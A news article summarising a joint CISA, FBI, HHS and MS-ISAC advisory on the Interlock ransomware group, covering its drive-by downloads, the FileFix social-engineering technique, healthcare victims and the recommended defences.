Interlock Ransomware Escalates Attacks: CISA and FBI Warn of Drive-By Downloads and FileFix Social Engineering
Share this article
Federal agencies are sounding the alarm as the Interlock ransomware operation intensifies attacks against critical infrastructure and healthcare organizations. In a joint advisory released Tuesday, CISA, FBI, HHS, and MS-ISAC revealed that the group—active since September 2024—has refined dangerous tactics to breach networks, steal data, and extort victims.
Unconventional Infiltration Methods
Investigators highlight Interlock's use of drive-by downloads from compromised legitimate websites—a rarity among ransomware gangs—to gain initial access. Once inside, attackers deploy remote access trojans like NodeSnake and execute double extortion: encrypting systems while threatening to leak stolen data unless ransoms are paid. Recent high-profile victims include healthcare giants DaVita (1.5TB exfiltrated) and Kettering Health.
CISA's alert details Interlock's evolving tactics
The FileFix Social Engineering Twist
Recently, Interlock adopted FileFix—a technique exploiting trusted Windows UI elements like File Explorer and HTML Applications (.HTA). Attackers disguise malicious PowerShell/JavaScript code within seemingly legitimate interfaces, bypassing security warnings entirely. This psychological manipulation targets human vulnerabilities rather than technical ones.
Mitigation Imperatives
The advisory prescribes concrete defenses:
- DNS filtering and web application firewalls to block malicious traffic
- Network segmentation to limit lateral movement
- Strict identity/access management with mandatory MFA
- Continuous patching of systems and firmware
- User training to recognize social engineering lures
"Interlock's evolution underscores how ransomware groups are weaponizing both technical loopholes and human psychology," notes the FBI analysis. "Defense now requires equal emphasis on technological controls and user awareness."
Why This Matters Beyond Healthcare
While healthcare remains Interlock's primary target, the group's success with novel attack vectors sets a dangerous precedent for all sectors. The FBI's disclosure of recent IOCs (as recent as June 2025) provides actionable intelligence, but the real lesson is strategic: reactive security is insufficient against adversaries blending social engineering with advanced encryption. As ransomware groups innovate, organizations must preemptively harden both infrastructure and human firewalls.
Source: CISA/FBI/HHS/MS-ISAC Joint Advisory, BleepingComputer